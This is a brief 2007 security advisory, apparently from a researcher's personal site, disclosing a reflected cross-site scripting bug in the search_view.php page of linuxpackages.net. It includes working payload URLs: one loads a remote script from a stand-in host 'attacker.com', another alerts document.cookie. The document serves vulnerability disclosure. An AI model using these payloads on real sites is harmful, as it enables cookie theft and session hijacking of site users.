kanedaaa... ... borys ... bohater ...
slackware - pakiety faqsecuritypublicartprocessinglinux mojetestslinkistatsstart
kaneda@bohater.net
+ Subject:
XSS bug for www.linuxpackages.net

+ Version:
2007.01.12

+ Discovered by:
Kanedaaa: http://kaneda.bohater.net

+ Linuxpackages.net Description:
This site is dedicated to the the enrichment and enhancement of the Slackware Linux operating system.
We are gathering a vast resource of Slackware packages from around the world. We feel that some of the other application sites have become to hard to use and its hard to find a package just for you. Many times no links to packages are even provided.

+ Description:
XSS IN:
http://www.linuxpackages.net/search_view.php?by=name&name=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fattacker.com%2Fxss.js%3E%3C%2FSCRIPT%3E&ver=

http://www.linuxpackages.net/search_view.php?by=name&name=%22%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&ver=

Posted data:
"><SCRIPT SRC=http://attacker.com/xss.js></SCRIPT>



Timeline:
2007.01.12 bug discovered
2007.01.12 "/" bug sent via mail to http://linuxpackages.net

Original Advisory: http://kaneda.bohater.net/security/20070112-xss-linuxpackages.net.php

Check my other bugs in security section: Security